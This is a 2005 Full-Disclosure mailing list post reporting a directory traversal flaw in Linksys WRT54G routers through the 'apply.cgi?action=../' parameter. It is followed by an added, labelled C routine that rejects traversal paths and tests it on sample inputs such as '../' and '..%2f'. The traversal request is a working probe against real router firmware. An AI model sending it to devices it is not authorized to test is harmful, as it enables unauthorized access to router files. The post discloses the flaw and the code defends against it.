[Full-disclosure] WRT54G directory traversal vulnerability

From: Shell (shell6_at_gmail.com)
Date: 10/12/05

    Date: Wed, 12 Oct 2005 16:36:31 -0400
    To: full-disclosure@lists.grok.org.uk
    
    

    I just found a vulnerability in Linksys WRT54G routers.

    http://192.168.1.1/apply.cgi?action=../

    It loads the page after action

    http://192.168.1.1/apply.cgi?action=../ returns the setup page
    http://192.168.1.1/apply.cgi?action=../blah returns that the file does not exist
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
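
A defensive check for the kind of parameter reported above, as an added example that is not part of the original post and is not Linksys firmware code. It assumes a handler that maps a request parameter to a file under a web root; the function names, the 256-byte buffer and the sample values are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode %XX once; -1 on a malformed escape, an embedded NUL, or overflow. */
static int pct_decode(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            char hex[3] = { in[1], in[2], '\0' };
            c = (unsigned char)strtol(hex, NULL, 16);
            in += 2;
        }
        if (c == '\0' || n + 1 >= outsz)
            return -1;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return 0;
}

/* 1 if the (hypothetical) page parameter resolves below the web root, else 0. */
int action_stays_in_webroot(const char *action)
{
    char buf[256];
    int depth = 0;
    /* Reject undecodable, empty, absolute, backslash or still-encoded input. */
    if (pct_decode(action, buf, sizeof buf) != 0 || buf[0] == '\0' ||
        buf[0] == '/' || strpbrk(buf, "\\%"))
        return 0;
    for (char *seg = strtok(buf, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, "..") == 0 && --depth < 0)
            return 0;                   /* climbed above the root */
        if (strcmp(seg, "..") != 0 && strcmp(seg, ".") != 0)
            depth++;                    /* ordinary path segment */
    }
    return depth > 0;                   /* must name something below the root */
}

int main(void)
{
    const char *samples[] = { "index.asp", "../", "../blah", "..%2f", "a/../../b" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-12s -> %d\n", samples[i], action_stays_in_webroot(samples[i]));
    return 0;
}
```

A fixed allowlist of known page names is stricter still; the lexical check above is for handlers that must accept arbitrary names under the root.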

